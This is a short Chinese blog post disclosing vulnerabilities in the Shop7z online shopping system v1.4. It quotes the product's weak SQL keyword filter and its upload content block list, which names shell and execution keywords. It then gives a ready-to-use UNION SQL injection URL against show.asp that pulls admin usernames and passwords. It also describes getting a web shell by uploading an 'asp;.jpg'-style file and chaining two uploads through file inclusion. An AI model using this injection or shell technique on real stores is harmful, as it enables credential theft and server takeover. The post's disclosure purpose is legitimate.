Faya's Blog For My Dream

缘起缘灭.缘终尽,花开花落.花归尘

Shop7z网上购物系统 v1.4 漏洞

文件dataname.asp

 

 

path_back=LCase(request.servervariables("QUERY_STRING"))

if instr(path_back,"insert")<>0 or instr(path_back,"update")<>0 or instr(path_back,"delete")<>0

or instr(path_back,"(")<>0 or instr(path_back,"'")<>0 or instr(path_back," or ")<>0 or instr(path_back,"replace")<>0

or instr(path_back,"eval")<>0 then

response.write "<BR><BR><center>你的网址不合法</a>"

奇葩了。。不知他这么写和没过滤有什么区别。。

于是 看了下数据文件表的结构。。

exp:

 

 

show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd

,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin

接下来 getshell

有两个上传的地方

一个是 ewebitor

一个是他自己写的

ewebitor只能上传jpg等正常文件,其他可以利用的都删了

看他自己写的上传。。

可以上传 2013xx.asp;.jpg格式的

可是

 

 

set MyFile = server.CreateObject("Scripting.FileSystemObject")

set MyText = MyFile.OpenTextFile(Server.mappath(filename)) '读取文本文件

sTextAll = lcase(MyText.ReadAll())

MyText.close

set MyFile = nothing

sStr=".getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|eval|雷驰新闻发布|script|"

sStr=sStr&".saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="

snum = split(sStr,"|")

for i=0 to ubound(snum)

     if instr(sTextAll,snum(i)) then

       set filedel = server.CreateObject("Scripting.FileSystemObject")

       filedel.deletefile Server.mappath(filename)

       set filedel = nothing

       Response.Write("<script>alert('上传失败0!');window.close();</script>")

       Response.End()

     end if

next

各种过滤有木有啊

可是他忘记了文件包含!

所以 两个上传 结合在一起 就可以getshell啦~~~

转载请指明@https://beizhansec.lofter.com/

2016-02-10  
漏洞
评论

© Faya's Blog For My Dream | Powered by LOFTER